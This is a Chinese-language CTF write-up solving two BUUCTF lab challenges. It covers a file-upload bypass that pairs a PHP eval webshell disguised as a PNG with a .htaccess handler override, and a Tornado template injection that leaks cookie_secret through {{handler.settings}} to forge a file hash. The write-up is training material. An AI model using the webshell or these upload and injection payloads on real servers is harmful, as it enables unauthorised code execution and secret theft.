1.BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞

（1）打开环境后就看到一个很特别的文件上传的界面，以为是一题简单的文件上传漏洞，实不然后面做了才发现并非那样（2）这里本来应该是先上传php文件，但是我想着它可能会有过滤啥的，所以直接上传一个png上去，发现传成功了

这里我传的是

GIF89a? 
<script language="php">eval($_POST['zjt']);</script>

（3）抱着试试的态度用蚁剑连连看，发现出错了，意料之中

（4）看了其他人的WP才知道这题是一个文件上传里的文件解析漏洞。总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。

.htaccess是什么

      看了其他博主写的才知道：启用.htaccess，需要修改httpd.conf，启用AllowOverride，并可以用AllowOverride限制特定命令的使用。如果需要使用.htaccess以外的其他文件名，可以用AccessFileName指令来改变。例如，需要使用.config ，则可以在服务器配置文件中按以下方法配置：AccessFileName .config 。

     也就是说，.htaccess可以帮我们实现包括：文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表，以及使用其他文件作为index文件等一些功能。

所以这里还需要上传一个.htaccess文件，内容如下

<FilesMatch "a.png">
SetHandler application/x-httpd-php
</FilesMatch>

还需要注意，里面的a.png要和刚才上传的png文件一样

（5）这里上传.htaccess文件后直接抓包更改Content-Type成image/jepg或者image/jepg都行

（6）看到页面渲染出现成功，说明可以用一件连接了，直接成功

（3）连接成功后其中一个目录里即可找到flag

2.[护网杯 2018]easy_tornado

（1）打开后是三个可文件，并不知道它要干嘛

（2）直接不多说，挨个打开，看看里面是些啥内容

（3）依次看了，属实没看出来要如何操作，陷入深思。。。。。。

看了其他大佬的wp才知道:

参数filename和filehash可以推测这里flag应该是

filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面，filehash里hash就是提示为md5的hash加密。 

变量 filename 的值正常是要访问的文件，然后根据提示三和 filehash 三个不同的值猜测 filehash 的值为MD5加密后的字符串。 filename知道了，还需要cookie_secrethints      后面它又提示render

再根据题目easy_tornado可推测是服务器模板注入（ssti模板注入）。

注:

ssti模板注入简单了解

（1）.简介

        漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

判断该存在该注入的一种方法：

   输入的数据会被浏览器利用当前脚本语言调用解析执行

   可以将其理解为：具体举例可以是我们开发的blog想换主题，都是直接换模版，但是数据库不会换，这样一些主题是通过向数据库拿数据来确定数据，如果我们把模版数据换了就会造成注入

（2）模板是什么

​       模板可以理解为一段固定好格式，等着你来填充信息的文件。通过这种方法，可以做到逻辑与视图分离，更容易、清楚且相对安全地编写前后端不同的逻辑。作为对比，一个很不好的解决方法是用脚本语言的字符串拼接html，然后统一输出。

模板基础知识

{% ... %} 用来声明变量

{{ ... }} 用来将表达式打印到模板输出

{# ... #} 表示未包含在模板输出中的注释

在模板注入中，主要使用的是{{}} 和 {%%}

检测是否存在ssti
在url后面，或是参数中添加 {{ 6*6 }} ，查看返回的页面中是否有 36

（3）模板渲染方法
flask渲染方法有render_template和render_template_string两种，我们需要做的就是，将我们想渲染的值传入模板的变量里

render_template() 是用来渲染一个指定的文件的。

render_template_string则是用来渲染一个字符串的。

回到正题

 因为render（）是tornado里的函数，可以生成html模板。是一个渲染函数 ，就是一个公式，能输出前端页面的公式。

 tornado是用Python编写的Web服务器兼Web应用框架，简单来说就是用来生成模板的东西。和Python相关，和模板相关，就可以推测这可能是个ssti注入题了。

 尝试构造一下

/file?filename=/fllllllllllllag&filehash={{1}}

查阅后才知道：

模板注入必须通过传输型如{{xxx}}的执行命令。探测方式很简单，给一个参数赋值{{22*22}}返回484则必然存在模板注入

（4）但是当我们输入error?msg={{1}}就可以得到回显，说明此处是存在SSTI注入漏洞的。

（5）当构造的payload为：error?msg={{2*2}}的时候，回显的结果是orz。因此可以猜测出，此处是出现了过滤。

（6）此时我们需要找的是cookie_secret,

 搜素得Tornado框架的附属文件handler.settings中存在cookie_secret

再次构造payload:

http://e8d1f189-e498-4c03-9b0f-4eef7c6c671c.node3.buuoj.cn/error?msg={{handler.settings}}

（7）此时的payload应该就是如下通过md5的结果：

file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))
1

 /fllllllllllllag通过md5加密后：3bf9f6cf685a6dd8defadabfb41a03a1

 **md5(cookie_secret+md5(/fllllllllllllag))**通过md5加密后的结果:77a1d0572298d9f79da44fd36511802c

此时构造payload:

/file?filename=/fllllllllllllag&filehash=77a1d0572298d9f79da44fd36511802c

（8）这里需要按照公式进行加密

（9）/fllllllllllllag=3bf9f6cf685a6dd8defadabfb41a03a1
cookie_secret+md5(filename)

cookie_secret：66ea9bc1-ba24-4e40-bce1-a8a75d43b425

（10）md5(cookie_secret+md5(filename)) 

ccbf9bdb48a05406ecbe929d8dbb6a62

构造payload：file?filename=/fllllllllllllag&filehash=ccbf9bdb48a05406ecbe929d8dbb6a62

也是成功拿到flag